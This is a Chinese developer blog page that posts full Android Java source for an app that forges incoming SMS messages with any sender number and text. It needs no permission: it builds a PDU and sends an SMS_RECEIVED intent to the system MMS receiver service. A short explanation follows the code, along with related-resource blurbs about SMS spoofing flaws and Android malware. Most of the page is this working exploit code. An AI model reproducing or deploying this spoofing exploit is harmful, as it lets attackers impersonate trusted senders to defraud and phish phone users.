`
iaiai
  • 浏览: 2204711 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

android 无权限 伪造短信

 
阅读更多
代码实现
package com.smstrick;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

public class SMSTrickActivity extends Activity implements OnClickListener{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);

        View continue_button = this.findViewById(R.id.button1);

        continue_button.setOnClickListener((OnClickListener) this);
    }
    public void onClick(View v) {
    	EditText eNum;
    	EditText eMsg;
    	String sNum;
    	String sMsg;
    	
    	eNum   = (EditText)findViewById(R.id.editText1);
    	eMsg   = (EditText)findViewById(R.id.editText2);
    	
    	sNum = eNum.getText().toString();
    	sMsg = eMsg.getText().toString();
    	

    	
    	//sNum cannot be blank
    	if(sNum.equals("")) sNum = "123456";
    	
    	createFakeSms(this.getApplicationContext(),sNum,sMsg);
    	
    }
    
    private static void createFakeSms(Context context, String sender, String body) {
    //Source: http://stackoverflow.com/a/12338541
    //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        byte[] pdu = null;
        byte[] scBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD("0000000000");
        byte[] senderBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD(sender);
        int lsmcs = scBytes.length;
        byte[] dateBytes = new byte[7];
        Calendar calendar = new GregorianCalendar();
        dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
        dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
        dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
        dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
        dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
        dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
        dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
                .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
        try {
        	Log.d("ice", "test one");
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            bo.write(lsmcs);
            bo.write(scBytes);
            bo.write(0x04);
            bo.write((byte) sender.length());
            bo.write(senderBytes);
            bo.write(0x00);
            bo.write(0x00); // encoding: 0 for default 7bit
            bo.write(dateBytes);
            try {
            	
                String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
                Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
                Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
                        "stringToGsm7BitPacked", new Class[] { String.class });
                stringToGsm7BitPacked.setAccessible(true);
                byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
                        body);
                bo.write(bodybytes);
            } catch (Exception e) {
            	e.printStackTrace();
            }

            pdu = bo.toByteArray();
        } catch (IOException e) {
        	e.printStackTrace();
        }

        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);
    }

    private static byte reverseByte(byte b) {
        return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
    }
}

实质分析 核心在于自定义了系统的
        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);

收到短信的intent,从而伪造了短信,而且不需要任何的权限。
分享到:
评论

相关推荐

    短信生成神器

    短信生成神器,解决了android4.4写短信无权限的问题, 可自动生成内容,也可以写动输入内容,可随机生成收发件箱也可选择,还可选汉语或英文字母,用以测试短信的备份还方便

    Android 恶意软件及病毒查杀示例

    在描述中提到的短信伪造漏洞是指CVE-2012-6636,这是一处允许恶意应用伪造短信来源的漏洞。攻击者可以利用这个漏洞发送看起来来自可信源的欺诈短信,诱导用户执行有害操作,例如点击恶意链接或泄露个人信息。此漏洞...

    Android移动智能终端操作系统安全机制的安全性评估.rar

    1. **权限管理机制**:Android基于Linux内核,采用权限管理系统,每个应用在安装时会被赋予特定的权限,如读取联系人、发送短信等。用户在安装应用时需明确这些权限,以防止恶意应用滥用权限。然而,一些应用可能会...

    Android系统手机恶意程序的静态检验方法研究.pdf

    2. **权限检查**:恶意程序往往请求不必要的权限,如访问联系人、短信、位置等。通过对APP请求的权限进行分析,可以发现异常行为。 3. **代码混淆与反混淆**:恶意软件常使用代码混淆技术隐藏真实意图。静态分析...

    Android应用源码之击溃360手机卫士的三大防护.zip

    这可能涉及网络通信协议分析,以及如何伪造数据以绕过拦截规则。 3. **隐私保护措施**: 隐私保护通常包括权限管理、数据加密和数据隔离。开发者可以通过源码学习如何检测应用请求的敏感权限,以及如何防止未授权...

    FakeSMS:支持 GSM_UCS2 的 createFakeSms()

    FakeSMS (with broadAnywhere(Bug: 17356824))Android本地生成PDU伪造任意短信代码(支持中文GSM_UCS2)新版使用伪造短信PDU,无权限要求。APK下载:

    安卓恶意软件的分析与检测.pdf

    例如,一个恶意软件可能在安装时仅申请了存储权限,但在实际运行时却执行了发送短信或监听通话的非法操作。 此外,Android系统的签名机制也存在不足。尽管Android要求所有应用都必须进行签名,但恶意开发者依然能够...

    XPrivacyLua:使用隐私管理器非常简单,适用于Android 6.0棉花糖和更高版本

    撤消应用程序的Android权限通常会使应用程序崩溃或发生故障。 XPrivacyLua通过为应用程序提供假数据而不是真实数据来解决此问题。 特征 使用简单 管理任何用户或系统应用 多用户支持 免费和开源 限制 确定活动(假...

    黑客防线杂志

    Android远程监控技术一节则介绍了在Android平台上实现远程监控的技术细节,包括如何伪造短信来实现监控目的,这对于手机安全和隐私保护是一个重要议题。 整体来看,《黑客防线》杂志2013年6月刊涉及的内容非常丰富...

    mobilesafe1:第一个移动安全项目

    1. **权限管理**:Android系统赋予了应用程序不同的权限,如读取联系人、短信、位置信息等。开发者需要明确声明所需的权限,并在用户安装应用时进行提示。项目中可能涉及如何合理设置和使用这些权限,确保应用功能的...

    近乎v5.0源码 Almostv50.rar

    v5.0对SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等主要威胁进行了系统的处理,实现了灵活、细致的权限管理功能,充分构筑了应用程序级安全。 8、易于扩展,便于开发 v5.0站点导航可自定义、可快速增加...

    PasswordManager

    3. 用户认证与授权:实现用户登录系统,可能涉及用户名/密码验证、多因素认证(MFA,如短信验证码、指纹识别等)和权限控制。Spring Security是一个流行的Java框架,可用于处理这些问题。 4. 客户端应用:创建一个...

Global site tag (gtag.js) - Google Analytics